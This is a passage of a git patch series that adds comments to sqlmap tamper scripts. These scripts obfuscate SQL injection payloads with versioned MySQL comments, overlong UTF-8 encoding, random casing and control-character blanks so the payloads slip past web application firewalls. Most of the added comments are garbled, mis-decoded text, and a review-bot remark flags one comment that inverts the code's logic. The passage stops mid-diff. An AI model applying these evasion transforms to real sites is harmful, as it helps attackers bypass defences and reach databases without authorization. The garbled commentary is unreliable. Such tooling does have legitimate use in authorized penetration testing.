@@ -36,9 +43,12 @@ def tamper(payload, **kwargs): headers["True-Client-IP"] = randomIP() # Reference: https://developer.chrome.com/multidevice/data-compression-for-isps#proxy-connection + # 娣诲姞涓涓猇ia澶达紝琛ㄧず閫氳繃Chrome Compression Proxy浠g悊 headers["Via"] = "1.1 Chrome-Compression-Proxy" # Reference: https://wordpress.org/support/topic/blocked-country-gaining-access-via-cloudflare/#post-9812007 + # 娣诲姞涓涓狢F-IPCountry澶达紝琛ㄧず閫氳繃Cloudflare浠g悊锛屽苟闅忔満閫夋嫨涓涓浗瀹 headers["CF-IPCountry"] = random.sample(('GB', 'US', 'FR', 'AU', 'CA', 'NZ', 'BE', 'DK', 'FI', 'IE', 'AT', 'IT', 'LU', 'NL', 'NO', 'PT', 'SE', 'ES', 'CH'), 1)[0] + # 杩斿洖娣诲姞浜唄eaders鐨刾ayload return payload From 2f377ec379bdec1a56fb80a5fe01036d726e6465 Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Mon, 30 Dec 2024 10:27:51 +0800 Subject: [PATCH 8/9] sck --- src/sqlmap-master/tamper/misunion.py | 7 ++++++- .../tamper/modsecurityversioned.py | 10 ++++++++++ .../tamper/modsecurityzeroversioned.py | 9 +++++++++ src/sqlmap-master/tamper/multiplespaces.py | 11 ++++++++-- src/sqlmap-master/tamper/ord2ascii.py | 2 ++ src/sqlmap-master/tamper/overlongutf8.py | 5 +++++ src/sqlmap-master/tamper/overlongutf8more.py | 3 +++ src/sqlmap-master/tamper/percentage.py | 4 ++++ src/sqlmap-master/tamper/plus2concat.py | 9 ++++++++- src/sqlmap-master/tamper/plus2fnconcat.py | 10 ++++++++-- src/sqlmap-master/tamper/randomcase.py | 10 +++++++--- src/sqlmap-master/tamper/space2morehash.py | 13 ++++++++++++ src/sqlmap-master/tamper/space2mssqlblank.py | 16 +++++++++++++++ src/sqlmap-master/tamper/space2mssqlhash.py | 10 ++++++++++ src/sqlmap-master/tamper/space2mysqlblank.py | 20 +++++++++++++++++++ src/sqlmap-master/tamper/space2mysqldash.py | 16 +++++++++++++++ 16 files changed, 146 insertions(+), 9 deletions(-) diff --git a/src/sqlmap-master/tamper/misunion.py b/src/sqlmap-master/tamper/misunion.py index 596880a..c852b82 100644 --- a/src/sqlmap-master/tamper/misunion.py +++ b/src/sqlmap-master/tamper/misunion.py 
@@ -8,12 +8,14 @@ See the file 'LICENSE' for copying permission import os import re +# 浠巗qlmap鐨勫簱涓鍏ヤ竴浜涙灇涓惧拰鍑芥暟 from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST +# 瀹氫箟dependencies鍑芥暟锛岀敤浜庡湪杩愯tamper鑴氭湰鏃舵樉绀鸿鍛婁俊鎭 def dependencies(): singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) @@ -32,5 +34,8 @@ def tamper(payload, **kwargs): >>> tamper('1" UNION ALL SELECT') '1"-.1UNION ALL SELECT' """ - + # 浣跨敤姝e垯琛ㄨ揪寮忔浛鎹ayload涓殑UNION鍏抽敭瀛楋紝鍓嶉潰鍔犱笂-.1 + # 杩欐牱鍋氭槸涓轰簡缁曡繃鏌愪簺WAF锛圵eb Application Firewall锛夌殑妫娴 + # 姝e垯琛ㄨ揪寮(?i)\s+(UNION )鍖归厤UNION鍏抽敭瀛楋紝骞朵笖蹇界暐澶у皬鍐 + # \g<1>鏄弽鍚戝紩鐢紝琛ㄧず鏇挎崲鏃朵繚鐣欏尮閰嶅埌鐨刄NION鍏抽敭瀛 return re.sub(r"(?i)\s+(UNION )", r"-.1\g<1>", payload) if payload else payload diff --git a/src/sqlmap-master/tamper/modsecurityversioned.py b/src/sqlmap-master/tamper/modsecurityversioned.py index 19c1d08..66ab070 100644 --- a/src/sqlmap-master/tamper/modsecurityversioned.py +++ b/src/sqlmap-master/tamper/modsecurityversioned.py @@ -7,16 +7,22 @@ See the file 'LICENSE' for copying permission import os +# 浠巗qlmap鐨勫簱涓鍏ラ殢鏈烘暟鐢熸垚鍑芥暟鍜屽崟娆¤鍛婃秷鎭嚱鏁 from lib.core.common import randomInt from lib.core.common import singleTimeWarnMessage +# 瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓惧拰浼樺厛绾ф灇涓 from lib.core.enums import DBMS from lib.core.enums import PRIORITY +# 璁剧疆杩欎釜tamper鑴氭湰鐨勪紭鍏堢骇 __priority__ = PRIORITY.HIGHER +# 瀹氫箟dependencies鍑芥暟锛岀敤浜庡湪杩愯tamper鑴氭湰鏃舵樉绀鸿鍛婁俊鎭 def dependencies(): + # 鏄剧ず鍗曟璀﹀憡娑堟伅锛屽憡鐭ョ敤鎴疯繖涓猼amper鑴氭湰鍙拡瀵筂ySQL鏁版嵁搴 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) +# 瀹氫箟tamper鍑芥暟锛岃繖鏄剼鏈殑涓昏鍔熻兘鍑芥暟锛岀敤浜庝慨鏀筽ayload def tamper(payload, **kwargs): """ Embraces complete query with (MySQL) versioned comment 
@@ -38,14 +44,18 @@ def tamper(payload, **kwargs): retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: postfix = '' + # 閬嶅巻鍙兘鐨勬敞閲婄鍙凤紝鎵惧埌payload涓殑绗竴涓敞閲婄鍙 for comment in ('#', '--', '/*'): if comment in payload: postfix = payload[payload.find(comment):] payload = payload[:payload.find(comment)] break + # 濡傛灉payload涓寘鍚┖鏍硷紝璇存槑鍙互鎻掑叆versioned comment if ' ' in payload: + # 鏋勯犳柊鐨刾ayload锛屾彃鍏ersioned comment retVal = "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix) return retVal diff --git a/src/sqlmap-master/tamper/modsecurityzeroversioned.py b/src/sqlmap-master/tamper/modsecurityzeroversioned.py index c646d1a..f83fb10 100644 --- a/src/sqlmap-master/tamper/modsecurityzeroversioned.py +++ b/src/sqlmap-master/tamper/modsecurityzeroversioned.py @@ -7,15 +7,21 @@ See the file 'LICENSE' for copying permission import os +# 浠巗qlmap鐨勫簱涓鍏ュ崟娆¤鍛婃秷鎭嚱鏁 from lib.core.common import singleTimeWarnMessage +# 瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓惧拰浼樺厛绾ф灇涓 from lib.core.enums import DBMS from lib.core.enums import PRIORITY +# 璁剧疆杩欎釜tamper鑴氭湰鐨勪紭鍏堢骇 __priority__ = PRIORITY.HIGHER +# 瀹氫箟dependencies鍑芥暟锛岀敤浜庡湪杩愯tamper鑴氭湰鏃舵樉绀鸿鍛婁俊鎭 def dependencies(): + # 鏄剧ず鍗曟璀﹀憡娑堟伅锛屽憡鐭ョ敤鎴疯繖涓猼amper鑴氭湰鍙拡瀵筂ySQL鏁版嵁搴 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) +# 瀹氫箟tamper鍑芥暟锛岃繖鏄剼鏈殑涓昏鍔熻兘鍑芥暟锛岀敤浜庝慨鏀筽ayload def tamper(payload, **kwargs): """ Embraces complete query with (MySQL) zero-versioned comment 
@@ -37,12 +43,15 @@ def tamper(payload, **kwargs): if payload: postfix = '' + # 閬嶅巻鍙兘鐨勬敞閲婄鍙凤紝鎵惧埌payload涓殑绗竴涓敞閲婄鍙 for comment in ('#', '--', '/*'): if comment in payload: postfix = payload[payload.find(comment):] payload = payload[:payload.find(comment)] break + # 濡傛灉payload涓寘鍚┖鏍硷紝璇存槑鍙互鎻掑叆zero-versioned comment if ' ' in payload: + # 鏋勯犳柊鐨刾ayload锛屾彃鍏ero-versioned comment retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix) return retVal diff --git a/src/sqlmap-master/tamper/multiplespaces.py b/src/sqlmap-master/tamper/multiplespaces.py index 8f2ae17..6e26a9b 100644 --- a/src/sqlmap-master/tamper/multiplespaces.py +++ b/src/sqlmap-master/tamper/multiplespaces.py @@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission import random import re +# 浠巗qlmap鐨勫簱涓鍏ョ煡璇嗗簱鍜屾暟鎹被鍨 from lib.core.data import kb from lib.core.datatype import OrderedSet from lib.core.enums import PRIORITY @@ -35,16 +36,22 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 浣跨敤OrderedSet瀛樺偍鎵惧埌鐨凷QL鍏抽敭瀛楋紝纭繚鍏抽敭瀛楃殑鍞竴鎬 words = OrderedSet() + # 浣跨敤姝e垯琛ㄨ揪寮忔壘鍒皃ayload涓殑鎵鏈夊崟璇嶏紙SQL鍏抽敭瀛楋級 for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() - + # 濡傛灉鍗曡瘝鏄疭QL鍏抽敭瀛楋紝鍒欐坊鍔犲埌OrderedSet涓 if word.upper() in kb.keywords: words.add(word) - + # 瀵逛簬OrderedSet涓殑姣忎釜SQL鍏抽敭瀛 for word in words: + # 鍦ㄥ叧閿瓧鍓嶅悗娣诲姞1鍒4涓殢鏈烘暟閲忕殑绌烘牸 + # (?<=\W)纭繚鎴戜滑鍦ㄩ潪鍗曡瘝瀛楃鍚庢浛鎹 + # (?=[^A-Za-z_(]|\Z)纭繚鎴戜滑鍦ㄩ潪鍗曡瘝瀛楃鍓嶆浛鎹㈡垨瀛楃涓叉湯灏 retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randint(1, 4), word, ' ' * random.randint(1, 4)), retVal) + # 瀵逛簬鍚庨潰绱ц窡鐫鎷彿鐨勫叧閿瓧锛屽彧娣诲姞宸﹁竟鐨勭┖鏍 retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randint(1, 4), word), retVal) return retVal diff --git a/src/sqlmap-master/tamper/ord2ascii.py b/src/sqlmap-master/tamper/ord2ascii.py index f5cf8a2..2277fc1 100644 --- a/src/sqlmap-master/tamper/ord2ascii.py +++ b/src/sqlmap-master/tamper/ord2ascii.py 
@@ -28,6 +28,8 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忓皢鎵鏈夌殑ORD()鍑芥暟璋冪敤鏇挎崲涓篈SCII()鍑芥暟璋冪敤 + # 姝e垯琛ㄨ揪寮(?i)\bORD\( 鍖归厤ORD鍏抽敭瀛楋紝蹇界暐澶у皬鍐欙紝骞朵笖纭繚鏄畬鏁寸殑鍗曡瘝杈圭晫 retVal = re.sub(r"(?i)\bORD\(", "ASCII(", payload) return retVal diff --git a/src/sqlmap-master/tamper/overlongutf8.py b/src/sqlmap-master/tamper/overlongutf8.py index 5945356..9fcd81b 100644 --- a/src/sqlmap-master/tamper/overlongutf8.py +++ b/src/sqlmap-master/tamper/overlongutf8.py @@ -32,14 +32,19 @@ def tamper(payload, **kwargs): retVal = "" i = 0 + # 閬嶅巻payload涓殑姣忎釜瀛楃 while i < len(payload): + # 濡傛灉褰撳墠瀛楃鏄%锛屽苟涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛屽垯璁や负杩欐槸涓涓凡缁忕紪鐮佺殑瀛楃 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += payload[i:i + 3] i += 3 else: + # 濡傛灉褰撳墠瀛楃涓嶆槸瀛楁瘝鎴栨暟瀛楋紝鍒欏皢鍏惰浆鎹负overlong UTF8缂栫爜 if payload[i] not in (string.ascii_letters + string.digits): + # 璁$畻骞舵坊鍔爋verlong UTF8缂栫爜 retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) else: + # 濡傛灉鏄瓧姣嶆垨鏁板瓧锛屽垯鐩存帴娣诲姞鍒扮粨鏋滀腑 retVal += payload[i] i += 1 diff --git a/src/sqlmap-master/tamper/overlongutf8more.py b/src/sqlmap-master/tamper/overlongutf8more.py index e713745..fd5a7d0 100644 --- a/src/sqlmap-master/tamper/overlongutf8more.py +++ b/src/sqlmap-master/tamper/overlongutf8more.py @@ -33,10 +33,13 @@ def tamper(payload, **kwargs): i = 0 while i < len(payload): + # 濡傛灉褰撳墠瀛楃鏄%锛屽苟涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛屽垯璁や负杩欐槸涓涓凡缁忕紪鐮佺殑瀛楃 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += payload[i:i + 3] i += 3 else: + # 灏嗗綋鍓嶅瓧绗﹁浆鎹负overlong UTF8缂栫爜 + # 姣忎釜瀛楃琚紪鐮佷负涓や釜瀛楄妭锛岀涓涓瓧鑺傜殑楂樹綅璁剧疆涓10锛0xC0锛夛紝绗簩涓瓧鑺傜殑楂樹綅璁剧疆涓10锛0x80锛 retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) i += 1 
diff --git a/src/sqlmap-master/tamper/percentage.py b/src/sqlmap-master/tamper/percentage.py index 9d62e60..3b772b1 100644 --- a/src/sqlmap-master/tamper/percentage.py +++ b/src/sqlmap-master/tamper/percentage.py @@ -13,7 +13,9 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW +# 瀹氫箟dependencies鍑芥暟锛岀敤浜庡湪杩愯tamper鑴氭湰鏃舵樉绀鸿鍛婁俊鎭 def dependencies(): + # 鏄剧ず鍗曟璀﹀憡娑堟伅锛屽憡鐭ョ敤鎴疯繖涓猼amper鑴氭湰鍙拡瀵笰SP web搴旂敤绋嬪簭 singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP web applications" % os.path.basename(__file__).split(".")[0]) def tamper(payload, **kwargs): @@ -40,10 +42,12 @@ def tamper(payload, **kwargs): i = 0 while i < len(payload): + # 濡傛灉褰撳墠瀛楃鏄%锛屽苟涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛屽垯璁や负杩欐槸涓涓凡缁忕紪鐮佺殑瀛楃 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += payload[i:i + 3] i += 3 elif payload[i] != ' ': + # 濡傛灉褰撳墠瀛楃涓嶆槸绌烘牸锛屽垯鍦ㄥ叾鍓嶉潰娣诲姞鐧惧垎鍙 retVal += '%%%s' % payload[i] i += 1 else: diff --git a/src/sqlmap-master/tamper/plus2concat.py b/src/sqlmap-master/tamper/plus2concat.py index 3b910f8..2499c81 100644 --- a/src/sqlmap-master/tamper/plus2concat.py +++ b/src/sqlmap-master/tamper/plus2concat.py @@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission import os import re +# 浠巗qlmap鐨勫簱涓鍏ュ崟娆¤鍛婃秷鎭嚱鏁般侀浂娣卞害鎼滅储鍑芥暟銆佹暟鎹簱绠$悊绯荤粺鏋氫妇鍜屼紭鍏堢骇鏋氫妇 from lib.core.common import singleTimeWarnMessage from lib.core.common import zeroDepthSearch from lib.core.enums import DBMS @@ -16,6 +17,7 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): + # 鏄剧ず鍗曟璀﹀憡娑堟伅锛屽憡鐭ョ敤鎴疯繖涓猼amper鑴氭湰鍙拡瀵筂icrosoft SQL Server鏁版嵁搴 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) def tamper(payload, **kwargs): 
@@ -41,15 +43,20 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔悳绱ayload涓敱'+'杩炴帴鐨凜HAR()鍑芥暟鎴栧崟寮曞彿瀛楃涓 match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal) if match: part = match.group(0) + # 灏嗗尮閰嶇殑閮ㄥ垎鎷嗗垎涓哄瓧绗﹀垪琛 chars = [char for char in part] + # 浣跨敤zeroDepthSearch鍑芥暟鎵惧埌鎵鏈夌殑'+'瀛楃浣嶇疆 for index in zeroDepthSearch(part, '+'): + # 灏'+'瀛楃鏇挎崲涓','瀛楃 chars[index] = ',' - + # 鏋勯燙ONCAT鍑芥暟鐨勫瓧绗︿覆琛ㄧず replacement = "CONCAT(%s)" % "".join(chars) + # 灏嗗師濮嬬殑鐢'+'杩炴帴鐨勯儴鍒嗘浛鎹负CONCAT鍑芥暟 retVal = retVal.replace(part, replacement) return retVal diff --git a/src/sqlmap-master/tamper/plus2fnconcat.py b/src/sqlmap-master/tamper/plus2fnconcat.py index ab1005a..8d8ce60 100644 --- a/src/sqlmap-master/tamper/plus2fnconcat.py +++ b/src/sqlmap-master/tamper/plus2fnconcat.py @@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission import os import re +# 浠巗qlmap鐨勫簱涓鍏ュ崟娆¤鍛婃秷鎭嚱鏁般侀浂娣卞害鎼滅储鍑芥暟銆佸吋瀹规ā鍧椾腑鐨剎range鍑芥暟銆佹暟鎹簱绠$悊绯荤粺鏋氫妇鍜屼紭鍏堢骇鏋氫妇 from lib.core.common import singleTimeWarnMessage from lib.core.common import zeroDepthSearch from lib.core.compat import xrange @@ -17,6 +18,7 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): + # 鏄剧ず鍗曟璀﹀憡娑堟伅锛屽憡鐭ョ敤鎴疯繖涓猼amper鑴氭湰鍙拡瀵筂icrosoft SQL Server鏁版嵁搴 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) def tamper(payload, **kwargs): 
@@ -43,22 +45,26 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔悳绱ayload涓敱'+'杩炴帴鐨凜HAR()鍑芥暟鎴栧崟寮曞彿瀛楃涓 match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal) if match: old = match.group(0) parts = [] last = 0 + # 浣跨敤zeroDepthSearch鍑芥暟鎵惧埌鎵鏈夌殑'+'瀛楃浣嶇疆 for index in zeroDepthSearch(old, '+'): + # 灏嗘瘡涓'+'瀛楃涔嬮棿鐨勯儴鍒嗕綔涓哄崟鐙殑閮ㄥ垎瀛樺偍 parts.append(old[last:index].strip('+')) last = index - + # 灏嗘渶鍚庝竴涓'+'瀛楃涔嬪悗鐨勯儴鍒嗕篃鍔犲叆鍒皃arts鍒楄〃涓 parts.append(old[last:].strip('+')) replacement = parts[0] + # 閬嶅巻parts鍒楄〃锛屾瀯閫爗fn CONCAT()}鍑芥暟鐨勫祵濂楄皟鐢 for i in xrange(1, len(parts)): replacement = "{fn CONCAT(%s,%s)}" % (replacement, parts[i]) - + # 灏嗗師濮嬬殑鐢'+'杩炴帴鐨勯儴鍒嗘浛鎹负{fn CONCAT()}鍑芥暟 retVal = retVal.replace(old, replacement) return retVal diff --git a/src/sqlmap-master/tamper/randomcase.py b/src/sqlmap-master/tamper/randomcase.py index 8cb02a8..5a48763 100644 --- a/src/sqlmap-master/tamper/randomcase.py +++ b/src/sqlmap-master/tamper/randomcase.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission import re +# 浠巗qlmap鐨勫簱涓鍏ラ殢鏈鸿寖鍥村嚱鏁般佸吋瀹规ā鍧椾腑鐨剎range鍑芥暟銆佺煡璇嗗簱鍜屼紭鍏堢骇鏋氫妇 from lib.core.common import randomRange from lib.core.compat import xrange from lib.core.data import kb @@ -48,19 +49,22 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔壘鍒皃ayload涓殑鎵鏈夊叧閿瓧锛堣嚦灏戜袱涓瓧姣嶆垨涓嬪垝绾跨殑鍗曡瘝锛 for match in re.finditer(r"\b[A-Za-z_]{2,}\b", retVal): word = match.group() - + # 濡傛灉鍗曡瘝鏄疭QL鍏抽敭瀛楋紝骞朵笖涓嶆槸琚紩鍙锋垨鎷彿鍖呭洿鐨勶紝鎴栬呮槸涓涓嚱鏁板悕 if (word.upper() in kb.keywords and re.search(r"(?i)[`\"'\[]%s[`\"'\]]" % word, retVal) is None) or ("%s(" % word) in payload: + # 鐢熸垚涓涓殢鏈哄ぇ灏忓啓娣峰悎鐨勫崟璇 while True: _ = "" for i in xrange(len(word)): + # 闅忔満閫夋嫨澶у啓鎴栧皬鍐 _ += word[i].upper() if randomRange(0, 1) else word[i].lower() - + # 纭繚鐢熸垚鐨勫崟璇嶄笉鏄叏澶у啓鎴栧叏灏忓啓锛屽苟閫鍑哄惊鐜 if len(_) > 1 and _ not in (_.lower(), _.upper()): break - + # 灏嗗師濮嬬殑鍗曡瘝鏇挎崲涓洪殢鏈哄ぇ灏忓啓娣峰悎鐨勫崟璇 retVal = retVal.replace(word, _) return retVal 
diff --git a/src/sqlmap-master/tamper/space2morehash.py b/src/sqlmap-master/tamper/space2morehash.py index 091bb9b..8df3c21 100644 --- a/src/sqlmap-master/tamper/space2morehash.py +++ b/src/sqlmap-master/tamper/space2morehash.py @@ -20,6 +20,10 @@ from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS __priority__ = PRIORITY.LOW def dependencies(): + """ + 妫鏌ユ槸鍚︽弧瓒宠剼鏈繍琛岀殑鏉′欢 + """ + # 杈撳嚭璀﹀憡淇℃伅锛屾彁绀簍amper鑴氭湰鍙傜敤浜嶮ySQL鐗堟湰澶т簬5.1.13 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): @@ -43,9 +47,13 @@ def tamper(payload, **kwargs): """ def process(match): + """ + 澶勭悊鍖归厤鍒扮殑鍗曡瘝 + """ word = match.group('word') randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) + # 濡傛灉鍖归厤鍒扮殑鍗曡瘝鍦ㄥ叧閿瘝鍒楄〃涓紝骞朵笖涓嶅湪蹇界暐绌烘牸褰卞搷鐨勫叧閿瘝鍒楄〃涓紝鍒欐浛鎹负闅忔満瀛楃涓 if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr)) else: @@ -53,16 +61,21 @@ def tamper(payload, **kwargs): retVal = "" + # 濡傛灉payload瀛樺湪锛屽垯杩涜鏇挎崲 if payload: payload = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", process, payload) + # 閬嶅巻payload涓殑姣忎釜瀛楃 for i in xrange(len(payload)): + # 濡傛灉瀛楃鏄┖鏍硷紝鍒欐浛鎹负闅忔満瀛楃涓 if payload[i].isspace(): randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) retVal += "%%23%s%%0A" % randomStr + # 濡傛灉瀛楃鏄#鎴栬呭瓧绗︽槸--锛屽垯灏唒ayload涓墿浣欑殑瀛楃娣诲姞鍒皉etVal涓紝骞惰烦鍑哄惊鐜 elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] break + # 鍚﹀垯灏嗗瓧绗︽坊鍔犲埌retVal涓 else: retVal += payload[i] diff --git a/src/sqlmap-master/tamper/space2mssqlblank.py b/src/sqlmap-master/tamper/space2mssqlblank.py index 5f055c8..7055f60 100644 --- a/src/sqlmap-master/tamper/space2mssqlblank.py +++ b/src/sqlmap-master/tamper/space2mssqlblank.py 
@@ -8,14 +8,20 @@ See the file 'LICENSE' for copying permission import os import random +# 瀵煎叆lib.core.common妯″潡涓殑singleTimeWarnMessage鍑芥暟 from lib.core.common import singleTimeWarnMessage +# 瀵煎叆lib.core.compat妯″潡涓殑xrange鍑芥暟 from lib.core.compat import xrange +# 瀵煎叆lib.core.enums妯″潡涓殑DBMS鏋氫妇 from lib.core.enums import DBMS +# 瀵煎叆lib.core.enums妯″潡涓殑PRIORITY鏋氫妇 from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW +# 瀹氫箟涓涓嚱鏁帮紝鐢ㄤ簬妫鏌ヨ剼鏈緷璧 def dependencies(): + # 杈撳嚭璀﹀憡淇℃伅锛岃鏄庤鑴氭湰鍙兘鐢ㄤ簬鐗瑰畾鏁版嵁搴 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) def tamper(payload, **kwargs): @@ -53,29 +59,38 @@ def tamper(payload, **kwargs): # CR 0D carriage return # SO 0E shift out # SI 0F shift in + # 瀹氫箟涓涓厓缁勶紝鍖呭惈涓浜涘瓧绗︿覆 blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A') + # 灏唒ayload璧嬪肩粰retVal retVal = payload if payload: retVal = "" quote, doublequote, firstspace, end = False, False, False, False + # 閬嶅巻payload涓殑姣忎釜瀛楃 for i in xrange(len(payload)): + # 濡傛灉褰撳墠瀛楃涓嶆槸绌烘牸锛屽垯灏唂irstspace璁剧疆涓篢rue if not firstspace: if payload[i].isspace(): firstspace = True + # 鍦╮etVal涓坊鍔犱竴涓殢鏈洪夋嫨鐨勭┖鏍 retVal += random.choice(blanks) continue + # 濡傛灉褰撳墠瀛楃鏄崟寮曞彿锛屽垯灏唓uote鍙栧弽 elif payload[i] == '\'': quote = not quote + # 濡傛灉褰撳墠瀛楃鏄弻寮曞彿锛屽垯灏哾oublequote鍙栧弽 elif payload[i] == '"': doublequote = not doublequote + # 濡傛灉褰撳墠瀛楃鏄#鎴栬--锛屽垯灏唀nd璁剧疆涓篢rue elif payload[i] == '#' or payload[i:i + 3] == '-- ': end = True + # 濡傛灉褰撳墠瀛楃鏄┖鏍硷紝涓斾笉鏄湪鍙屽紩鍙锋垨鍗曞紩鍙蜂腑锛屽垯鏍规嵁end鐨勫兼坊鍔犱竴涓殢鏈洪夋嫨鐨勭┖鏍 elif payload[i] == " " and not doublequote and not quote: if end: retVal += random.choice(blanks[:-1]) @@ -84,6 +99,7 @@ def tamper(payload, **kwargs): continue + # 灏嗗綋鍓嶅瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] return retVal diff --git a/src/sqlmap-master/tamper/space2mssqlhash.py b/src/sqlmap-master/tamper/space2mssqlhash.py index 67e31e6..64788a8 100644 
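Review bot: The comment placed above `if not firstspace:` states that firstspace is set when the current character is not a space, which inverts the logic: that branch runs while no whitespace has been seen yet, and firstspace only becomes True on the first whitespace character, which is then replaced by a random blank. Suggest `# until the first whitespace is seen only that blank is rewritten; quote tracking starts after it`, and drop the content-free comment added above `blanks`, which already has the table of control characters directly above it. The enclosing `tamper` function starts outside this hunk.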
--- a/src/sqlmap-master/tamper/space2mssqlhash.py +++ b/src/sqlmap-master/tamper/space2mssqlhash.py @@ -27,14 +27,24 @@ def tamper(payload, **kwargs): retVal = "" + # 濡傛灉payload涓嶄负绌 if payload: + # 閬嶅巻payload鐨勬瘡涓瓧绗 for i in xrange(len(payload)): + # 濡傛灉瀛楃鏄┖鏍 if payload[i].isspace(): + # 灏%23%0A娣诲姞鍒皉etVal涓 retVal += "%23%0A" + # 濡傛灉瀛楃鏄#鎴栬呭瓧绗︽槸-- elif payload[i] == '#' or payload[i:i + 3] == '-- ': + # 灏唒ayload鐨勫墿浣欓儴鍒嗘坊鍔犲埌retVal涓 retVal += payload[i:] + # 璺冲嚭寰幆 break + # 鍚﹀垯 else: + # 灏嗗瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/space2mysqlblank.py b/src/sqlmap-master/tamper/space2mysqlblank.py index 399370c..ef81d36 100644 --- a/src/sqlmap-master/tamper/space2mysqlblank.py +++ b/src/sqlmap-master/tamper/space2mysqlblank.py @@ -43,30 +43,50 @@ def tamper(payload, **kwargs): # CR 0D carriage return # VT 0B vertical TAB (MySQL and Microsoft SQL Server only) # A0 non-breaking space + # 瀹氫箟涓涓寘鍚壒娈婂瓧绗︾殑鍏冪粍 blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0') + # 灏唒ayload璧嬪肩粰retVal retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: + # 灏唕etVal缃负绌哄瓧绗︿覆 retVal = "" + # 瀹氫箟涓変釜甯冨皵鍙橀噺锛屽垎鍒〃绀烘槸鍚﹀湪寮曞彿鍐呫佸弻寮曞彿鍐呭拰绗竴涓┖鏍 quote, doublequote, firstspace = False, False, False + # 閬嶅巻payload鐨勬瘡涓瓧绗 for i in xrange(len(payload)): + # 濡傛灉绗竴涓┖鏍间负鍋 if not firstspace: + # 濡傛灉褰撳墠瀛楃鏄┖鏍 if payload[i].isspace(): + # 灏嗙涓涓┖鏍肩疆涓虹湡 firstspace = True + # 灏嗕竴涓殢鏈洪夋嫨鐨勭壒娈婂瓧绗︽坊鍔犲埌retVal涓 retVal += random.choice(blanks) + # 缁х画涓嬩竴娆″惊鐜 continue + # 濡傛灉褰撳墠瀛楃鏄崟寮曞彿 elif payload[i] == '\'': + # 灏唓uote鍙栧弽 